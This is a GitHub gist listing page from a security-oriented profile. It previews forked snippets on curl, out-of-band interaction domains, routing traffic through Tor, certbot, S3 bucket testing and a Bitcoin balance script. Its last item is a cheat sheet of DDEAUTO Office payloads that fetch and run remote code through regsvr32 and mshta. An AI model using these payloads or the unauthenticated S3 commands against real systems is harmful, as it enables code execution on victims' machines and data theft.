Skip to content

Instantly share code, notes, and snippets.

Avatar
Pwning

calfcrusher CalfCrusher

Pwning
View GitHub Profile
@CalfCrusher
CalfCrusher / curl.md
Created Nov 10, 2022 — forked from subfuzion/curl.md
curl POST examples
View curl.md

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

View Out of band interaction domains
interact.sh
oast.pro
oast.live
oast.site
oast.online
oast.fun
oast.me
burpcollaborator.net
oastify.com
canarytokens.com
@CalfCrusher
CalfCrusher / route-traffic-through-tor-iptables.md
Created Oct 25, 2022 — forked from jkullick/route-traffic-through-tor-iptables.md
Route all Traffic through Tor for specific User on Linux with IPTables
View route-traffic-through-tor-iptables.md
iptables -A OUTPUT -p icmp -j REJECT
iptables -t nat -A OUTPUT ! -o lo -p tcp -m owner --uid-owner $USER -m tcp -j REDIRECT --to-ports 9040
iptables -t nat -A OUTPUT ! -o lo -p udp -m owner --uid-owner $USER -m udp --dport 53 -j REDIRECT --to-ports 53
iptables -t filter -A OUTPUT -p tcp -m owner --uid-owner $USER -m tcp --dport 9040 -j ACCEPT
iptables -t filter -A OUTPUT -p udp -m owner --uid-owner $USER -m udp --dport 53 -j ACCEPT
iptables -t filter -A OUTPUT ! -o lo -m owner --uid-owner $USER -j DROP
@CalfCrusher
CalfCrusher / tor.sh
Created Oct 25, 2022 — forked from DarthPumpkin/tor.sh
OS X shell script for routing all traffic through tor. Requires tor to be installed (brew install tor). Taken from https://kremalicious.com/simple-tor-setup-on-mac-os-x/, modified from http://leonid.shevtsov.me/en/an-easy-way-to-use-tor-on-os-x To stop using tor just terminate this script with Ctrl C
View tor.sh
#!/usr/bin/env bash
# 'Wi-Fi' or 'Ethernet' or 'Display Ethernet'
INTERFACE=Wi-Fi
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
View route-all-traffic-through-tor.md

Do not use in production Server or if you don't know what iptables do

Add this to torrc ( located on /etc/tor/torrc):

VirtualAddrNetwork 10.192.0.0/10

AutomapHostsOnResolve 1

TransPort 9051 
@CalfCrusher
CalfCrusher / readme.md
Created Oct 22, 2022 — forked from sohlich/readme.md
Let's encrypt - generate SSL certificate manually via Cerbot DNS Challenge
View readme.md

Install Certbot

OSX

$ brew install certbot

Linux

@CalfCrusher
CalfCrusher / readme.txt
Created Oct 19, 2022 — forked from nathanqthai/readme.txt
simple tornado server with ssl
View readme.txt
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt
run server:
chmod +x server.py
./server.py
test server:
openssl s_client -connect localhost:8888
@CalfCrusher
CalfCrusher / aws-s3-buckets-pentest.txt
Created Sep 28, 2022 — forked from Anon-Exploiter/aws-s3-buckets-pentest.txt
Useful commands while testing s3 buckets!
View aws-s3-buckets-pentest.txt
aws s3 ls s3://s3buckethere --no-sign-request ## Lists the file in the s3 bucket
aws s3 cp s3://bucketname/filethere.txt . --no-sign-request ## Downloads `filethere.txt` from the s3 bucket in the current directory
aws s3 cp test.txt s3://bucketname --no-sign-request ## Uploads `test.txt` from current directory to the s3 bucket
aws s3api get-bucket-acl --bucket bucketname --no-sign-request ## Shows ACL (Access Control List) of the given bucket
aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request ## Shows ACL (Access Control List) of given object in the bucket
@CalfCrusher
CalfCrusher / btcbal.py
Created Sep 25, 2022 — forked from lukem512/btcbal.py
Retrieve Bitcoin address balance from Blockchain API
View btcbal.py
#!/usr/bin/python
import sys
import getopt
import urllib2
from optparse import OptionParser
def main():
# variables
btcaddr = ""
@CalfCrusher
CalfCrusher / Macro-Less-Cheatsheet.md
Created Aug 8, 2022 — forked from mgeeky/Macro-Less-Cheatsheet.md
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
View Macro-Less-Cheatsheet.md

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

  • Using regsvr32 *.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using HTA files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"